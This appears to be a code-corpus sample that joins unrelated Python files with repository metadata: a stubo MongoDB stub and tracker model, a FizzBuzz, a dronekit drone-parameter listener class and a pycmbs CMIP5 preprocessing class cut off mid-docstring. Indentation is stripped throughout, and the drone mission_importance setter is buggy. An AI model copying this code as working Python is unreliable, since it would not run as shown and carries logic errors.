# finish time
finish_time = time.time()
log.info("Recorded calculated in %s ms" % int((finish_time - start_time) * 1000))
# if name is provided - return only single recorded date for specific scenario.
if name:
scenario_recorded = None
try:
scenario_recorded = result_dict[name]
except KeyError:
log.debug("Wrong scenario name supplied (%s)" % name)
except Exception as ex:
log.warn("Failed to get scenario recorded date for: %s, error: %s" % (name, ex))
return scenario_recorded
else:
# returning full list (scenarios and sizes)
return result_dict
def size(self, name=None):
"""
Calculates scenario sizes. If name is not supplied - returns a dictionary with scenario name and size
(in bytes):
{ 'scenario_1': 5646145,
'scenario_2': 12312312}
If a name is supplied - returns a size Integer in bytes.
:param name: optional parameter to get size of specific scenario
:return: <dict> - if name is not supplied, <int> - if scenario name supplied.
"""
start_time = time.time()
pipeline = [{
'$group': {
'_id': '$scenario',
'size': {'$sum': {'$divide': ['$space_used', 1024]}}
}
}]
# use the pipe to calculate scenario sizes
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['size'] for x in result}
# finish time
finish_time = time.time()
log.info("Sizes calculated in %s ms" % int((finish_time - start_time) * 1000))
# if name is provided - return only single size for specific scenario.
if name:
scenario_size = None
try:
scenario_size = result_dict[name]
except KeyError:
log.debug("Wrong scenario name supplied (%s)" % name)
except Exception as ex:
log.warn("Failed to get scenario size for: %s, error: %s" % (name, ex))
return scenario_size
else:
# returning full list (scenarios and sizes)
return result_dict
def stub_counts(self):
"""
Calculates stub counts:
{ 'scenario_1': 100,
'scenario_2': 20}
Remember, that if the scenario doesn't have any stubs - it will not be in this list since it is not accessing
scenario collection to add scenarios with 0 stubs.
:return: <dict>
"""
start_time = time.time()
pipeline = [{'$group': {
'_id': '$scenario',
'count': {'$sum': 1}
}
}]
# use the pipe to calculate scenario stub counts
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['count'] for x in result}
# finish time
finish_time = time.time()
log.info("Stub counts calculated in %s ms" % int((finish_time - start_time) * 1000))
return result_dict
@staticmethod
def _create_hash(matchers):
"""
Creates a hash out of matchers list.
:param matchers: <list> matchers
:return: matchers md5 hash
"""
if matchers is not None:
return hashlib.md5(u"".join(unicode(matchers))).hexdigest()
elif matchers is None:
return None
def get_matched_stub(self, name, matchers_hash):
"""
Gets matched stub for specific scenario. Relies on indexed "matchers" key in scenario_stub object
:param name: <string> scenario name
:param matchers_hash: <string> matcher hash
:return: matched stub document or None if stub not found
"""
if name:
pattern = {'scenario': name,
'matchers_hash': matchers_hash}
return self.db.scenario_stub.find_one(pattern)
def insert_stub(self, doc, stateful):
"""
Insert stub into DB. Performs a check whether this stub already exists in database or not. If it exists
and stateful is True - new response is appended to the response list, else - reports that duplicate stub
found and it will not be inserted.
:param doc: Stub class with Stub that will be inserted
:param stateful: <boolean> specify whether stub insertion should be stateful or not
:return: <string> message with insertion status:
ignored - if not stateful and stub was already present
updated - if stateful and stub was already present
created - if stub was not present in database
"""
# getting initial values - stub matchers, scenario name
matchers = doc['stub'].contains_matchers()
scenario = doc['scenario']
matchers_hash = self._create_hash(matchers)
# check if we have matchers - should be None for REST calls
if matchers is not None:
# additional helper value for indexing
doc['matchers_hash'] = matchers_hash
matched_stub = self.get_matched_stub(name=scenario, matchers_hash=matchers_hash)
# checking if stub already exists
if matched_stub:
# creating stub object from found document
the_stub = Stub(matched_stub['stub'], scenario)
if not stateful and doc['stub'].response_body() == the_stub.response_body():
msg = 'duplicate stub found, not inserting.'
log.warn(msg)
result = {'status': 'ignored',
'msg': msg,
'key': str(matched_stub['_id'])}
return result
# since stateful is true - updating stub body by extending the list
log.debug('In scenario: {0} found exact match for matchers:'
' {1}. Perform stateful update of stub.'.format(scenario, matchers))
response = the_stub.response_body()
response.extend(doc['stub'].response_body())
the_stub.set_response_body(response)
# updating Stub body and size, writing to database
self.db.scenario_stub.update(
{'_id': matched_stub['_id']},
{'$set': {'stub': the_stub.payload,
'space_used': len(unicode(the_stub.payload))}})
result = {'status': 'updated',
'msg': 'Updated with stateful response',
'key': str(matched_stub['_id'])}
return result
# inserting stub into DB
status = self.db.scenario_stub.insert(self.get_stub_document(doc))
result = {'status': 'created',
'msg': 'Inserted scenario_stub',
'key': str(status)}
return result
@staticmethod
def get_stub_document(doc):
"""
prepares stub document for insertion into database
:param doc:
:return:
"""
doc['stub'] = doc['stub'].payload
# additional helper for aggregation framework
try:
doc['recorded'] = doc['stub']['recorded']
except KeyError:
# during tests "recorded" value is not supplied
pass
# calculating stub size
doc['space_used'] = len(unicode(doc['stub']))
return doc
def insert_pre_stub(self, scenario, stub):
status = self.db.pre_scenario_stub.insert(dict(scenario=scenario,
stub=stub.payload))
return 'inserted pre_scenario_stub: {0}'.format(status)
def remove_all(self, name):
self.db.scenario.remove({'name': name})
self.db.scenario_stub.remove({'scenario': name})
self.db.pre_scenario_stub.remove({'scenario': name})
def remove_all_older_than(self, name, recorded):
# recorded = yyyy-mm-dd
self.db.scenario_stub.remove({
'scenario': name,
'recorded': {"$lt": recorded}
})
self.db.pre_scenario_stub.remove({
'scenario': name,
'recorded': {"$lt": recorded}
})
if not self.stub_count(name):
self.db.scenario.remove({'name': name})
class Tracker(object):
def __init__(self, db=None):
self.db = db or mongo_client
def insert(self, track, write_concern=0):
# w=0 disables write ack
"""
Insert tracker doc into MongoDB and creates indexes for faster search.
:param track: tracker object
:param write_concern: 1 or 0, check mongo docs for more info
:return:
"""
forced_log_id = track.get('forced_log_id')
if forced_log_id:
track['_id'] = int(forced_log_id)
return self.db.tracker.insert(track, w=write_concern)
def _create_index(self, key=None, direction=DESCENDING):
"""
Creates index for specific key, fails silently if index creation was unsuccessful. Key examples:
"host" , "scenario", "scenario", "request_params.session"
:param key: <string>
:param direction: ASCENDING or DESCENDING (from pymongo)
"""
if key:
try:
self.db.tracker.create_index(key, direction)
except Exception as ex:
log.debug("Could not create index (tracker collection) for key %s, got error: %s" % (key, ex))
def find_tracker_data(self, tracker_filter, skip, limit):
projection = {'start_time': 1, 'function': 1, 'return_code': 1, 'scenario': 1,
'stubo_response': 1, 'duration_ms': 1, 'request_params.session': 1,
'delay': 1}
if skip < 0:
skip = 0
# sorted on start_time descending
return self.db.tracker.find(tracker_filter, projection).sort('start_time',
-1).limit(limit).skip(skip)
def item_count(self, query=None):
"""
Total item counter for tracker collection.
:param query: query dict, example : { return_code: { $ne: 200 } }
:return:
"""
if query is not None:
return self.db.tracker.find(query).count()
else:
return self.db.tracker.count()
def find_tracker_data_full(self, _id):
return self.db.tracker.find_one({'_id': ObjectId(_id)})
def session_last_used(self, scenario, session, mode):
"""
Return the date this session was last used using the
last put/stub time (for record) or last get/response time otherwise.
"""
if mode == 'record':
function = 'put/stub'
else:
function = 'get/response'
host, scenario_name = scenario.split(':')
return self.db.tracker.find_one({
'host': host,
'scenario': scenario_name,
'request_params.session': session,
'function': function}, sort=[("start_time", DESCENDING)])
def get_last_playback(self, scenario, session, start_time):
start = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'request_params.mode': 'playback',
'function': 'begin/session',
'start_time': {"$lt": start_time}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
end = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'function': 'end/session',
'start_time': {"$gt": start_time}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
if not (start or end):
return []
project = {'start_time': 1, 'return_code': 1, 'stubo_response': 1,
'response_headers': 1, 'request_headers': 1, 'duration_ms': 1,
'request_params': 1, 'request_text': 1, 'delay': 1}
query = {
'scenario': scenario,
'request_params.session': session,
'function': 'get/response',
'start_time': {"$gt": start['start_time'],
"$lt": end['start_time']}
}
return self.db.tracker.find(query, project).sort("start_time",
ASCENDING)
def get_last_recording(self, scenario, session, end):
# find the last begin/session?mode=record from the last put/stub time
start = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'request_params.mode': 'record',
'function': 'begin/session',
'start_time': {"$lt": end}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
if not start:
return []
project = {'start_time': 1, 'return_code': 1, 'stubo_response': 1,
'response_headers': 1, 'request_headers': 1, 'duration_ms': 1,
'request_params': 1, 'request_text': 1, 'delay': 1}
# get all the put/stubs > last begin/session?mode=record and <= last put/stub
query = {
'scenario': scenario,
'request_params.session': session,
'function': 'put/stub',
'start_time': {"$gt": start['start_time'],
"$lte": end}
}
log.debug('tracker.find: {0}'.format(query))
return self.db.tracker.find(query, project).sort("start_time",
ASCENDING)
def session_last_used(scenario, session_name, mode):
tracker = Tracker()
return tracker.session_last_used(scenario, session_name, mode)
|
Stub-O-Matic-BA/stubo-app
|
stubo/model/db.py
|
Python
|
gpl-3.0
| 23,064 | 0.002688 |
# from index import db
# class MyObject():
# def __init__(self):
# pass
# @staticmethod
# def get_something(arg1, arg2):
# return something
|
tferreira/Flask-Redis
|
application/models.py
|
Python
|
mit
| 170 | 0 |
n = 1
while n <= 100:
if (n % 3 == 0 and n % 5 == 0):
print "FizzBuzz"
elif (n % 3 == 0):
print "Fizz"
elif (n % 5 == 0):
print "Buzz"
else:
print n
n += 1
|
CorySpitzer/FizzBuzz
|
everest/FizzBuzz.py
|
Python
|
mit
| 175 | 0.091429 |
"""
The parameters class. It is initialized with the vehicle's attributes at time of construction
but it is constantly updated through attribute listeners after calling the add_listeners() function
These parameters can provide the basic info for a future collision avoidance scheme.
Any functions that can refer to the parameters can be written here.
Added support for "dummy" initialization for experimental purposes
"""
from dronekit import connect, Command, VehicleMode, LocationGlobalRelative, LocationGlobal, socket
import uuid, random, time
class Params:
def __init__(self, network=None, vehicle=None, dummy=False):
if dummy:
self.ID = random.randint(1000, 9999)
self.last_recv = time.time()
self.version = 1
self.ekf_ok = False
self.gps_fix = 3
self.gps_sat = 10
self.gps_eph = 100
self.gps_epv = 200
self.set_global_alt = True
self.set_attitude = True
self.mode = "AUTO"
self.global_alt = 10
self.global_lat = -35.3632086902
self.global_lon = 149.165274916
self.distance_from_self = None
self.mission_importance = 0
self.heading = 300 #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = 100 #percentage
self.velocity = [0.5, -3.1, 0.7] #m/s, airspeed
self.groundspeed = 3.46 #m/s
self.airspeed = 3.46 #m/s
self.system_status = "OK"
else:
self.ID = uuid.uuid4().int #Random UUID
self.last_recv = None
self.version = vehicle.version.release_version()
self.ekf_ok = vehicle.ekf_ok
self.gps_fix = vehicle.gps_0.fix_type
self.gps_sat = vehicle.gps_0.satellites_visible
self.gps_eph = vehicle.gps_0.eph
self.gps_epv = vehicle.gps_0.epv
self.set_global_alt = vehicle.capabilities.set_altitude_target_global_int
self.set_attitude = vehicle.capabilities.set_attitude_target
self.mode = vehicle.mode.name
self.global_alt = vehicle.location.global_relative_frame.alt
self.global_lat = vehicle.location.global_relative_frame.lat
self.global_lon = vehicle.location.global_relative_frame.lon
self.distance_from_self = None
self.mission_importance = 0 #default, for hobbyists and recreation
self.heading = vehicle.heading #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = vehicle.battery.level #percentage
self.velocity = vehicle.velocity #m/s, airspeed
self.groundspeed = vehicle.groundspeed #m/s
self.airspeed = vehicle.airspeed #m/s
self.system_status = vehicle.system_status.state
self.add_listeners(network, vehicle)
def add_listeners(self, network, vehicle):
"""
The function to observe updated values. These values must be contained in the params class
and a networking scheme (through drone_network) must be active.
Object vehicle can be accesed through network.vehicle but it is an input for
the correct syntax of python's decorator functions.
Any observers here are implemented based on the tutorial found in:
http://python.dronekit.io/automodule.html#dronekit.Locations.on_attribute
Some of the values pass through thresholding so as to limit writes.
Thresholding is done based on experience and needs
"""
if network == None:
print "No listeners added due to unknown network"
return
#State of System (Initializing, Emergency, etc.)
@vehicle.on_attribute('system_status')
def decorated_system_status_callback(self, attr_name, value):
network.vehicle_params.system_status = value.state
print 'System status changed to: ', network.vehicle_params.system_status
#Battery information
@vehicle.on_attribute('battery')
def decorated_battery_callback(self, attr_name, value):
if network.vehicle_params.battery_level == value.level:
pass
else:
network.vehicle_params.battery_level = value.level
#print 'Battery level: ', network.vehicle_params.battery_level
#Velocity information (m/s)
#return velocity in all three axis
@vehicle.on_attribute('velocity')
def decorated_velocity_callback(self, attr_name, value):
if network.vehicle_params.velocity == value:
pass
else:
network.vehicle_params.velocity = value
#print 'Velocity changed to:\n', network.vehicle_params.velocity, ' m/s'
"""
Airspeed and groundspeed are exactly the same in the simulation but
this is not applicable in real-life scenarios.
Tolerance is added to cm scale
Return: speed (m/s)
"""
@vehicle.on_attribute('airspeed')
def decorated_airspeed_callback(self, attr_name, value):
if network.vehicle_params.airspeed == round(value, 2):
pass
else:
network.vehicle_params.airspeed = round(value, 2)
#print 'Airspeed changed to: ', network.vehicle_params.airspeed, ' m/s'
@vehicle.on_attribute('groundspeed')
def decorated_groundspeed_callback(self, attr_name, value):
if network.vehicle_params.groundspeed == round(value, 2):
pass
else:
network.vehicle_params.groundspeed = round(value, 2)
#print 'Groundspeed changed to: ', network.vehicle_params.groundspeed, ' m/s'
#State of EKF
#return: True/False
@vehicle.on_attribute('vehicle.ekf_ok')
def decorated_ekf_ok_callback(self, attr_name, value):
network.vehicle_params.ekf_ok = value
print 'EKF availability changed to: ', network.vehicle_params.ekf_ok
#GPS-related info
#return: .eph (HDOP) .epv (VDOP) .fix_type .satellites_visible
@vehicle.on_attribute('vehicle.gps_0')
def decorated_gps_callback(self, attr_name, value):
network.vehicle_params.gps_fix = value.fix_type
network.vehicle_params.gps_sat = value.satellites_visible
network.vehicle_params.gps_eph = value.eph
network.vehicle_params.gps_epv = value.epv
print 'GPSInfo changed to:\nFix:', network.vehicle_params.gps_fix, \
'\nSatellites:', network.vehicle_params.gps_sat, '\nEPH:', network.vehicle_params.gps_eph, \
'\nEPV: ', network.vehicle_params.gps_epv
#Set altitude offboard
#return: True/False
@vehicle.on_attribute('set_altitude_target_global_int')
def decorated_set_global_altitude_callback(self, attr_name, value):
network.vehicle_params.set_global_alt = value
print 'Ability to set global altitude changed to: ', network.vehicle_params.set_global_alt
#Set attitude offboard
#return: True/False
@vehicle.on_attribute('set_attitude_target')
def decorated_set_attitude_callback(self, attr_name, value):
network.vehicle_params.set_attitude = value
print 'Ability to set attitude changed to: ', network.vehicle_params.set_attitude
#Flying mode
@vehicle.on_attribute('mode')
def decorated_mode_callback(self, attr_name, value):
network.vehicle_params.mode = value.name
print 'Mode changed to: ', network.vehicle_params.mode
"""
A precision of 7 decimal digits in lat/lon degrees is satisfactory.
Tolerance of 7 decimal digits in degrees equals 11 milimetres
http://gis.stackexchange.com/questions/8650/how-to-measure-the-accuracy-of-latitude-and-longitude
Returns: altitude (metres)
longitude (degrees)
latitude (degrees)
"""
@vehicle.on_attribute('location.global_relative_frame')
def decorated_global_relative_frame_callback(self, attr_name, value):
if network.vehicle_params.global_alt == round(value.alt, 2) and \
network.vehicle_params.global_lat == round(value.lat, 7) and \
network.vehicle_params.global_lon == round(value.lon, 7):
pass
else:
network.vehicle_params.global_alt = round(value.alt, 2)
network.vehicle_params.global_lat = round(value.lat, 7)
network.vehicle_params.global_lon = round(value.lon, 7)
#print 'Location changed to:\nAlt:', network.vehicle_params.global_alt, \
# '\nLat:', network.vehicle_params.global_lat, '\nLon:', network.vehicle_params.global_lon
"""
Drone 360-degree heading, 0 is North.
Added a tolerance of +-1 degree
"""
@vehicle.on_attribute('heading')
def decorated_heading_callback(self, attr_name, value):
if network.vehicle_params.heading == value or \
network.vehicle_params.heading == (value + 1) or \
network.vehicle_params.heading == (value - 1):
pass
else:
network.vehicle_params.heading = value
#print 'Heading changed to: ', network.vehicle_params.heading
#Updates the next waypoint in case of mission
@vehicle.on_message('MISSION_CURRENT')
def message_listener(self, name, message):
try:
if network.vehicle_params.next_wp == message.seq:
return
else:
print 'Next waypoint changed'
network.vehicle_params.next_wp = message.seq
cmd = vehicle.commands
if cmd.count == 0:
print 'No waypoints found'
else:
print 'Waypoint', cmd.next, ' out of ', cmd.count, ':'
pos = cmd.next - 1
print 'Frame, Lat, Lon, Alt:', cmd[pos].frame, cmd[
pos].x, cmd[pos].y, cmd[pos].z
network.vehicle_params.next_wp_lat = cmd[pos].x
network.vehicle_params.next_wp_lon = cmd[pos].y
network.vehicle_params.next_wp_alt = cmd[pos].z
except Exception, e:
print "Error: ", e
def print_all(self):
print "Printing parameter set of drone with ID:", self.ID
print "Version:\t\t\t", self.version
print "Last Received:\t\t\t", self.last_recv
print "EKF_OK:\t\t\t\t", self.ekf_ok
print "GPS fix:\t\t\t", self.gps_fix
print "GPS No. satellites:\t\t", self.gps_sat
print "GPS EPH:\t\t\t", self.gps_eph
print "GPS EPV:\t\t\t", self.gps_epv
print "Global altitude settable:\t", self.set_global_alt
print "Global attitude settable:\t", self.set_attitude
print "Distance from self:\t\t", self.distance_from_self
print "Vehicle mode:\t\t\t", self.mode
print "Global altitude:\t\t", self.global_alt
print "Global latitude:\t\t", self.global_lat
print "Global longitude:\t\t", self.global_lon
print "Mission Importance:\t\t", self._mission_importance
print "Heading (degrees):\t\t", self.heading
print "Next waypoint number:\t\t", self.next_wp
print "Next waypoint latitude:\t\t", self.next_wp_lat
print "Next waypoint longitude:\t", self.next_wp_lon
print "Next waypoint altitude:\t\t", self.next_wp_alt
print "Battery level (%):\t\t", self.battery_level
print "Velocity (airspeed m/s):\t", self.velocity
print "Groundspeed (m/s):\t\t", self.groundspeed
print "Airspeed (m/s):\t\t\t", self.airspeed
print "System status:\t\t\t", self.system_status
print "\n\n"
"""
*EXTREMELY HACKABLE*
Level 0: Default (e.g. for hobbyists, recreation, entertainment)
Level 1: Important (e.g. for businesses, industry-related activity)
Level 2: Top (e.g. for search and rescue, security activity)
In order to elevate mission privileges, a special request must be made to the according authorities
Currently not supported
"""
@property
def mission_importance(self):
return self._mission_importance
@mission_importance.setter
def mission_importance(self, level):
#Need to add all kinds of security here
self._mission_importance = 0
if level == 1 | level == 2:
print "You need to ask permission from authoritative personel"
#if request_successful: self._mission_importance = level
#else: print "You don't have the rights."
|
LeonNie52/dk-plus
|
test files/params.py
|
Python
|
gpl-3.0
| 13,072 | 0.008415 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print ''
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitely specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs) # routine needs to be implemented by each subclass
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degrees S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
mdata._raw_filename = filename1
mdata._monthly_filename = file_monthly
mdata._clim_filename = mdata_clim_file
mdata._varname = varname
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_temperature_2m(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_albedo(self, interval='season', dic_up=None, dic_down=None):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
As the usage of different variables requires knowledge of the configuration of
the input streams, these need to be provided in addition
Parameters
----------
dic_up : dict
dictionary for get_surface_shortwave_radiation_up() as specified in model_data_routines.json
dic_down : dict
dictionary for get_surface_shortwave_radiation_down() as specified in model_data_routines.json
"""
assert dic_up is not None, 'ERROR: dic_up needed'
assert dic_down is not None, 'ERROR: dic_down needed'
force_calc = False
# read land-sea mask
#~ ls_mask = get_T63_landseamask(self.shift_lon)
#~ target grid ??? valid mask ????
def _extract_dict_from_routine_name(k, s):
# extract dictionary name from routine name in model_data_routines.json
res = ast.literal_eval(s[k].split('**')[1].rstrip()[:-1])
#~ print res, type(res)
return res
# extract coniguration dictionaries for flues from model_data_routines
kw_up = _extract_dict_from_routine_name('surface_upward_flux', dic_up)
kw_down = _extract_dict_from_routine_name('sis', dic_down)
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
# get fluxes
Fu = self.get_surface_shortwave_radiation_up(interval=interval, **kw_up)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
lab = Fu_i._get_label()
Fd = self.get_surface_shortwave_radiation_down(interval=interval, **kw_down)
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
# albedo for chosen interval as caluclated as ratio of means of fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
#~ Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
#~ Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
class CMIP5RAWData(CMIP5Data):
"""
This class is supposed to use CMIP5 data in RAW format.
This means that it builds on the CMORIZED CMIP5 data, but
performs all necessary preprocessing step like e.g. calculation
of ensemble means
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAW'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, varname, **kwargs):
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
return self._get_ensemble_filename(varname, mip, realm)
def _get_ensemble_filename(self, the_variable, mip, realm):
"""
get filename of ensemble mean file
if required, then all pre-processing steps are done
Parameters
----------
the_variable : str
